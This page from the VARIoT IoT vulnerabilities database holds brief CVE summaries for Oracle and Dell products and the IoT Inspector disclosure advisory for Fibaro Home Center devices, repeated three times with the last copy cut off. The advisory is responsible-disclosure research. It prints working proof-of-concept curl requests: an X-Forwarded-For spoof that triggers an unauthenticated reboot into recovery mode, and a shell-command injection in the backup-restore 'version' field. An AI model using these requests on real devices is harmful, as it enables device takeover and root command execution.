VARIoT IoT vulnerabilities database

Vulnerability in the Oracle Cloud Infrastructure Storage Gateway product of Oracle Storage Gateway (component: Management Console). The supported version that is affected is Prior to 1.4. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Cloud Infrastructure Storage Gateway. While the vulnerability is in Oracle Cloud Infrastructure Storage Gateway, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Cloud Infrastructure Storage Gateway. Note: Updating the Oracle Cloud Infrastructure Storage Gateway to version 1.4 or later will address these vulnerabilities. Download the latest version of Oracle Cloud Infrastructure Storage Gateway from <a href=" https://www.oracle.com/downloads/cloud/oci-storage-gateway-downloads.html">here. Refer to Document <a href="https://support.oracle.com/rs?type=doc&id=2768897.1">2768897.1 for more details. CVSS 3.1 Base Score 9.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). (DoS) An attack may occur

Vulnerability in the Oracle Cloud Infrastructure Storage Gateway product of Oracle Storage Gateway (component: Management Console). The supported version that is affected is Prior to 1.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Cloud Infrastructure Storage Gateway. While the vulnerability is in Oracle Cloud Infrastructure Storage Gateway, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Cloud Infrastructure Storage Gateway. Note: Updating the Oracle Cloud Infrastructure Storage Gateway to version 1.4 or later will address these vulnerabilities. Download the latest version of Oracle Cloud Infrastructure Storage Gateway from <a href=" https://www.oracle.com/downloads/cloud/oci-storage-gateway-downloads.html">here. Refer to Document <a href="https://support.oracle.com/rs?type=doc&id=2768897.1">2768897.1 for more details. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Dell EMC NetWorker versions 18.x,19.x prior to 19.3.0.4 and 19.4.0.0 contain an Information Disclosure in Log Files vulnerability. A local low-privileged user of the Networker server could potentially exploit this vulnerability to read plain-text credentials from server log files. Dell NetWorker is an application of Dell (Dell). Provides Dell's forum discussion function. A security vulnerability exists in Dell NetWorker that could allow an attacker to escalate his privileges by bypassing restrictions through a log file of plain text credentials

Dell PowerScale OneFS 8.1.0 - 9.1.0 contains a privilege escalation in SmartLock compliance mode that may allow compadmin to execute arbitrary commands as root. Dell Technologies Dell PowerScale OneFS is an operating system of Dell Technologies in the United States. Offers the PowerScale OneFS operating system for scale-out NAS

Dell PowerScale OneFS 8.1.0 - 9.1.0 contains an LDAP Provider inability to connect over TLSv1.2 vulnerability. It may make it easier to eavesdrop and decrypt such traffic for a malicious actor. Note: This does not affect clusters which are not relying on an LDAP server for the authentication provider. Dell Technologies Dell PowerScale OneFS is an operating system of Dell Technologies in the United States. Offers the PowerScale OneFS operating system for scale-out NAS

In Fibaro Home Center 2 and Lite devices with firmware version 4.540 and older an authenticated user can run commands as root user using a command injection vulnerability. IoT Inspector Research Lab Advisory IOT-20210408-0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ title: Multiple vulnerabilities vendor/product: Fibaro Home Center Light / Fibaro Home Center 2 https://www.fibaro.com/ vulnerable version: 4.600 and older fixed version: 4.610 CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, CVE-2021-20992 impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 9.8 (critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H reported: 2020-11-18 publication: 2021-04-08 by: Marton Illes, IoT Inspector Research Lab https://www.iot-inspector.com/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Vendor description: ------------------- "FIBARO is a global brand based on the Internet of Things technology. It provides solutions for building and home automation. FIBARO's headquarters and factory are located in Wysogotowo, 3 miles away from Poznan. The company employs app. 250 employees." https://www.fibaro.com/en/about-us/ Vulnerability overview/description: ----------------------------------- 1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989) Home Center devices initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using a man-in-the-middle attack and a device initiated remote port-forward channel can be used to connect to the web management interface. IoT Inspector identified a disabled SSH host key check, which enables man-in-the-middle attacks. By initiating connections to the Fibaro cloud an attacker can eavesdrop on communication between the user and the device. As communication inside the SSH port-forward is not encrypted (see #4 on management interface), user sessions, tokens and passwords can be hijacked. 2) Unauthenticated access to shutdown, reboot and reboot to recovery mode (CVE-2021-20990) An internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot, or a reboot into recovery mode. In recovery mode, an attacker can upload firmware without authentication. Similar problems were also discovered by Pavel Cheremushkin from Kaspersky ICS Cert: https://securelist.com/fibaro-smart-home/91416/ 4) Unencrypted management interface (CVE-2021-20992) Home Center devices provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens, and passwords. The management interface is only available over HTTP on the local network. The vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device. Proof of concept: ----------------- 1) Cloud SSH Connection Man-in-the-Middle Attack Home Center devices initiate a SSH connection to the Fibaro cloud ./etc/init.d/fibaro/RemoteAccess <snip> DAEMON=/usr/bin/ssh .... case "$1" in start) ..... # get IP local GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria l}&HW_Key=${HW_Key}" local IP_Response; IP_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d ' !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~') # get PORT local GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S erial}&HW_Key=${HW_Key}" local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d ' !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~') .... start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \ -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}" </snip> The device uses dropbear ssh to initiate the connection; option -y disables any host-key checks, voiding much of the otherwise added transport-layer security by SSH: "Always accept hostkeys if they are unknown." The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: lb-1.eu.ra.fibaro.com An attacker can use DNS spoofing or other means to intercept the connection. By using any hostkey, the attacker can successfully authenticate the SSH connection. Once the connection is authenticated, the client initiates a remote port-forward: -R "${PORT_Response}":localhost:80 This enables the attacker to access port 80 (management interface) of the device. A similar problem exists for remote support connections: ./opt/fibaro/scripts/remote-support.lua <snip> function handleResponse(response) responseJson = json.decode(response.data) print(json.encode(responseJson)) local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip.. ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip os.execute(autoSSHCommand) end function getSupportData() remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' .. serialNumber .. '&HW_Key=' .. HWKey print(remoteUrl) http = net.HTTPClient({timeout = 5000}) http:request(remoteUrl, { options = { method = 'GET' }, success = function(response) handleResponse(response) end, error = function(error) print(error) end }) end getSupportData() </snip> Here, the remote support endpoint returns the following data: {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY .ZZZ"} The same dropbear ssh client is used with option -y. In this case, port 22 (ssh) is made accessible through the port-forward. However, the device only allows public key authentication with a hard-coded SSH key. No further testing has been done on compromising the support SSH connection. 2) Unauthenticated access to shutdown, reboot and reboot to recovery mode The device is running a nginx server, which forwards some requests to a lighttpd server (8000) for further processing: <snip> proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location ~* \.php$ { proxy_pass http://127.0.0.1:8000; } location ~* \.php\?.* { proxy_pass http://127.0.0.1:8000; } </snip> The lighttpd server is not only accessible locally, but also via the local network. Authentication and authorization is implemented in PHP and there is a special check for connections originating from within the host. However, when checking the remote IP address, the header X-Forwarded-For is also considered: ./var/www/authorize.php <snip> function isLocalRequest() { $ipAddress = ""; if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR']; else $ipAddress = $_SERVER['REMOTE_ADDR']; $whitelist = array( '127.0.0.1', '::1' ); if(in_array($ipAddress, $whitelist)) return true; return false; } </snip> As the lighttpd service available via the network, an attacked can inject the required header X-Forwarded-For as well. The check isLocalRequest is used to "secure" multiple endpoints: ./var/www/services/system/shutdown.php <snip> <?php require_once("../../authorize.php"); if (!isLocalRequest() && !isAuthorized()) { sendUnauthorized(); } else { exec("systemShutdown"); } ?> </snip> ./var/www/services/system/reboot.php <snip> function authorize() { return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, role::INSTALLER)); } function handlePOST($text) { if (!isLocalRequest() && !authorize()) { sendUnauthorized(); return; } $params = tryDecodeJson($text); if(!is_null($params) && isset($params->recovery) && $params->recovery === true) exec("rebootToRecovery"); else exec("systemReboot"); } $requestBody = file_get_contents('php://input'); $requestMethod = $_SERVER['REQUEST_METHOD']; if ($requestMethod == "POST") handlePOST($requestBody); else setStatusMethodNotAllowed(); </snip> An attacker can issue the the following HTTP request to reboot the device into recovery mode: curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d '{"recovery":true}' http://DEVICE:8000/services/system/reboot.php In recovery mode, firmware images can be updated without authentication. 3) Authenticated remote command execution (versions before 4.550) Backup & restore operations could be triggered though HTTP endpoints: ./var/www/services/system/backups.php <snip> function restoreBackup($params) { if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0) { setStatusTooManyRequests(); return; } $type = $params->type; $id = $params->id; $version = $params->version; if (is_null($id) || !is_numeric($id) || $id < 1 ) { setStatusBadRequest(); return; } $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3"); if ($type == "local" && $hcVersion == "HC2" || $type == "remote") { $version ? exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id . ' ' . $version) : exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id); } else { setStatusBadRequest(); return; } setStatusAccepted(); } </snip> The parameter $version is not sanitized or escaped, which allows an attacker to inject shell commands into the exec() call: cat > /tmp/exploit <<- EOM {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}} EOM curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: application/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php Version 4.550 and later have proper escaping: <snip> $version = escapeshellarg($params->version); </snip> 4) Unencrypted management interface NMMAP shows a few open ports on the box: PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8000/tcp open http-alt Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Vulnerable / tested versions: ----------------------------- Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version at the time of the discovery Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530 Solution: --------- Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1, 2 and 3. Vulnerability 4 is not fixed as the vendor assumes that the local network is trusted and the device only provides wired network access. Furthermore, the vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device. Advisory URL: ------------- https://www.iot-inspector.com/blog/advisory-fibaro-home-center/ Vendor contact timeline: ------------------------ 2020-11-18: Contacting Fibaro through support@fibaro.com, support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com 2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn 2020-11-24: Adivsory sent to Fibaro by email 2020-12-01: Fibaro confirmed the receipt of the advisory 2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes 2021-03-16: Fibaro beta release (4.601) with the fixes 2021-03-24: Fibaro applies for CVE numbers 2021-03-31: Fibaro GA release (4.610) with the fix 2021-04-08: IoT Inspector Research Lab publishes advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ The IoT Inspector Research Lab is an integrated part of IoT Inspector. IoT Inspector is a platform for automated security analysis and compliance checks of IoT firmware. Our mission is to secure the Internet of Things. In order to discover vulnerabilities and vulnerability patterns within IoT devices and to further enhance automated identification that allows for scalable detection within IoT Inspector, we conduct excessive security research in the area of IoT. Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT firmware, we aim to responsibly disclose relevant information to the vendor of the affected IoT device as well as the general public in a way that minimizes potential harm and encourages further security analyses of IoT systems. You can find our responsible disclosure policy here: https://www.iot-inspector.com/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Interested in using IoT Inspector for your research or product? Mail: research at iot-inspector dot com Web: https://www.iot-inspector.com Blog: https://www.iot-inspector.com/blog/ Twitter: https://twitter.com/iotinspector EOF Marton Illes / @2021

Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using DNS spoofing attack and a device initiated remote port-forward channel can be used to connect to the web management interface. Knowledge of authorization credentials to the management interface is required to perform any further actions. IoT Inspector Research Lab Advisory IOT-20210408-0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ title: Multiple vulnerabilities vendor/product: Fibaro Home Center Light / Fibaro Home Center 2 https://www.fibaro.com/ vulnerable version: 4.600 and older fixed version: 4.610 CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, CVE-2021-20992 impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 9.8 (critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H reported: 2020-11-18 publication: 2021-04-08 by: Marton Illes, IoT Inspector Research Lab https://www.iot-inspector.com/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Vendor description: ------------------- "FIBARO is a global brand based on the Internet of Things technology. It provides solutions for building and home automation. FIBARO's headquarters and factory are located in Wysogotowo, 3 miles away from Poznan. The company employs app. IoT Inspector identified a disabled SSH host key check, which enables man-in-the-middle attacks. By initiating connections to the Fibaro cloud an attacker can eavesdrop on communication between the user and the device. As communication inside the SSH port-forward is not encrypted (see #4 on management interface), user sessions, tokens and passwords can be hijacked. 2) Unauthenticated access to shutdown, reboot and reboot to recovery mode (CVE-2021-20990) An internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot, or a reboot into recovery mode. In recovery mode, an attacker can upload firmware without authentication. (Potentially an earlier version with known remote command execution vulnerability, see #3) 3) Authenticated remote command execution (versions before 4.550) (CVE-2021-20991) An authenticated user can run commands as root user using a command injection vulnerability. Similar problems were also discovered by Pavel Cheremushkin from Kaspersky ICS Cert: https://securelist.com/fibaro-smart-home/91416/ 4) Unencrypted management interface (CVE-2021-20992) Home Center devices provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens, and passwords. The management interface is only available over HTTP on the local network. The vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device. case "$1" in start) ..... # get IP local GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria l}&HW_Key=${HW_Key}" local IP_Response; IP_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d ' !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~') # get PORT local GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S erial}&HW_Key=${HW_Key}" local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d ' !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~') .... start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \ -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}" </snip> The device uses dropbear ssh to initiate the connection; option -y disables any host-key checks, voiding much of the otherwise added transport-layer security by SSH: "Always accept hostkeys if they are unknown." The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: lb-1.eu.ra.fibaro.com An attacker can use DNS spoofing or other means to intercept the connection. By using any hostkey, the attacker can successfully authenticate the SSH connection. A similar problem exists for remote support connections: ./opt/fibaro/scripts/remote-support.lua <snip> function handleResponse(response) responseJson = json.decode(response.data) print(json.encode(responseJson)) local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip.. ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip os.execute(autoSSHCommand) end function getSupportData() remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' .. serialNumber .. '&HW_Key=' .. HWKey print(remoteUrl) http = net.HTTPClient({timeout = 5000}) http:request(remoteUrl, { options = { method = 'GET' }, success = function(response) handleResponse(response) end, error = function(error) print(error) end }) end getSupportData() </snip> Here, the remote support endpoint returns the following data: {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY .ZZZ"} The same dropbear ssh client is used with option -y. In this case, port 22 (ssh) is made accessible through the port-forward. However, the device only allows public key authentication with a hard-coded SSH key. No further testing has been done on compromising the support SSH connection. 2) Unauthenticated access to shutdown, reboot and reboot to recovery mode The device is running a nginx server, which forwards some requests to a lighttpd server (8000) for further processing: <snip> proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location ~* \.php$ { proxy_pass http://127.0.0.1:8000; } location ~* \.php\?.* { proxy_pass http://127.0.0.1:8000; } </snip> The lighttpd server is not only accessible locally, but also via the local network. Authentication and authorization is implemented in PHP and there is a special check for connections originating from within the host. However, when checking the remote IP address, the header X-Forwarded-For is also considered: ./var/www/authorize.php <snip> function isLocalRequest() { $ipAddress = ""; if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR']; else $ipAddress = $_SERVER['REMOTE_ADDR']; $whitelist = array( '127.0.0.1', '::1' ); if(in_array($ipAddress, $whitelist)) return true; return false; } </snip> As the lighttpd service available via the network, an attacked can inject the required header X-Forwarded-For as well. The check isLocalRequest is used to "secure" multiple endpoints: ./var/www/services/system/shutdown.php <snip> <?php require_once("../../authorize.php"); if (!isLocalRequest() && !isAuthorized()) { sendUnauthorized(); } else { exec("systemShutdown"); } ?> </snip> ./var/www/services/system/reboot.php <snip> function authorize() { return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, role::INSTALLER)); } function handlePOST($text) { if (!isLocalRequest() && !authorize()) { sendUnauthorized(); return; } $params = tryDecodeJson($text); if(!is_null($params) && isset($params->recovery) && $params->recovery === true) exec("rebootToRecovery"); else exec("systemReboot"); } $requestBody = file_get_contents('php://input'); $requestMethod = $_SERVER['REQUEST_METHOD']; if ($requestMethod == "POST") handlePOST($requestBody); else setStatusMethodNotAllowed(); </snip> An attacker can issue the the following HTTP request to reboot the device into recovery mode: curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d '{"recovery":true}' http://DEVICE:8000/services/system/reboot.php In recovery mode, firmware images can be updated without authentication. 3) Authenticated remote command execution (versions before 4.550) Backup & restore operations could be triggered though HTTP endpoints: ./var/www/services/system/backups.php <snip> function restoreBackup($params) { if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0) { setStatusTooManyRequests(); return; } $type = $params->type; $id = $params->id; $version = $params->version; if (is_null($id) || !is_numeric($id) || $id < 1 ) { setStatusBadRequest(); return; } $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3"); if ($type == "local" && $hcVersion == "HC2" || $type == "remote") { $version ? exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id . ' ' . $version) : exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id); } else { setStatusBadRequest(); return; } setStatusAccepted(); } </snip> The parameter $version is not sanitized or escaped, which allows an attacker to inject shell commands into the exec() call: cat > /tmp/exploit <<- EOM {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}} EOM curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: application/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php Version 4.550 and later have proper escaping: <snip> $version = escapeshellarg($params->version); </snip> 4) Unencrypted management interface NMMAP shows a few open ports on the box: PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8000/tcp open http-alt Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Vulnerable / tested versions: ----------------------------- Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version at the time of the discovery Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530 Solution: --------- Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1, 2 and 3. Vulnerability 4 is not fixed as the vendor assumes that the local network is trusted and the device only provides wired network access. Furthermore, the vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device. Advisory URL: ------------- https://www.iot-inspector.com/blog/advisory-fibaro-home-center/ Vendor contact timeline: ------------------------ 2020-11-18: Contacting Fibaro through support@fibaro.com, support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com 2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn 2020-11-24: Adivsory sent to Fibaro by email 2020-12-01: Fibaro confirmed the receipt of the advisory 2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes 2021-03-16: Fibaro beta release (4.601) with the fixes 2021-03-24: Fibaro applies for CVE numbers 2021-03-31: Fibaro GA release (4.610) with the fix 2021-04-08: IoT Inspector Research Lab publishes advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ The IoT Inspector Research Lab is an integrated part of IoT Inspector. IoT Inspector is a platform for automated security analysis and compliance checks of IoT firmware. Our mission is to secure the Internet of Things. In order to discover vulnerabilities and vulnerability patterns within IoT devices and to further enhance automated identification that allows for scalable detection within IoT Inspector, we conduct excessive security research in the area of IoT. Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT firmware, we aim to responsibly disclose relevant information to the vendor of the affected IoT device as well as the general public in a way that minimizes potential harm and encourages further security analyses of IoT systems. You can find our responsible disclosure policy here: https://www.iot-inspector.com/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Interested in using IoT Inspector for your research or product? Mail: research at iot-inspector dot com Web: https://www.iot-inspector.com Blog: https://www.iot-inspector.com/blog/ Twitter: https://twitter.com/iotinspector EOF Marton Illes / @2021

In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode. IoT Inspector Research Lab Advisory IOT-20210408-0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ title: Multiple vulnerabilities vendor/product: Fibaro Home Center Light / Fibaro Home Center 2 https://www.fibaro.com/ vulnerable version: 4.600 and older fixed version: 4.610 CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, CVE-2021-20992 impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 9.8 (critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H reported: 2020-11-18 publication: 2021-04-08 by: Marton Illes, IoT Inspector Research Lab https://www.iot-inspector.com/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Vendor description: ------------------- "FIBARO is a global brand based on the Internet of Things technology. It provides solutions for building and home automation. FIBARO's headquarters and factory are located in Wysogotowo, 3 miles away from Poznan. The company employs app. 250 employees." https://www.fibaro.com/en/about-us/ Vulnerability overview/description: ----------------------------------- 1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989) Home Center devices initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using a man-in-the-middle attack and a device initiated remote port-forward channel can be used to connect to the web management interface. IoT Inspector identified a disabled SSH host key check, which enables man-in-the-middle attacks. By initiating connections to the Fibaro cloud an attacker can eavesdrop on communication between the user and the device. As communication inside the SSH port-forward is not encrypted (see #4 on management interface), user sessions, tokens and passwords can be hijacked. In recovery mode, an attacker can upload firmware without authentication. (Potentially an earlier version with known remote command execution vulnerability, see #3) 3) Authenticated remote command execution (versions before 4.550) (CVE-2021-20991) An authenticated user can run commands as root user using a command injection vulnerability. Similar problems were also discovered by Pavel Cheremushkin from Kaspersky ICS Cert: https://securelist.com/fibaro-smart-home/91416/ 4) Unencrypted management interface (CVE-2021-20992) Home Center devices provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens, and passwords. The management interface is only available over HTTP on the local network. The vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device. Proof of concept: ----------------- 1) Cloud SSH Connection Man-in-the-Middle Attack Home Center devices initiate a SSH connection to the Fibaro cloud ./etc/init.d/fibaro/RemoteAccess <snip> DAEMON=/usr/bin/ssh .... case "$1" in start) ..... # get IP local GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria l}&HW_Key=${HW_Key}" local IP_Response; IP_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d ' !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~') # get PORT local GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S erial}&HW_Key=${HW_Key}" local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d ' !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~') .... start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \ -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}" </snip> The device uses dropbear ssh to initiate the connection; option -y disables any host-key checks, voiding much of the otherwise added transport-layer security by SSH: "Always accept hostkeys if they are unknown." The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: lb-1.eu.ra.fibaro.com An attacker can use DNS spoofing or other means to intercept the connection. By using any hostkey, the attacker can successfully authenticate the SSH connection. Once the connection is authenticated, the client initiates a remote port-forward: -R "${PORT_Response}":localhost:80 This enables the attacker to access port 80 (management interface) of the device. A similar problem exists for remote support connections: ./opt/fibaro/scripts/remote-support.lua <snip> function handleResponse(response) responseJson = json.decode(response.data) print(json.encode(responseJson)) local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip.. ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip os.execute(autoSSHCommand) end function getSupportData() remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' .. serialNumber .. '&HW_Key=' .. HWKey print(remoteUrl) http = net.HTTPClient({timeout = 5000}) http:request(remoteUrl, { options = { method = 'GET' }, success = function(response) 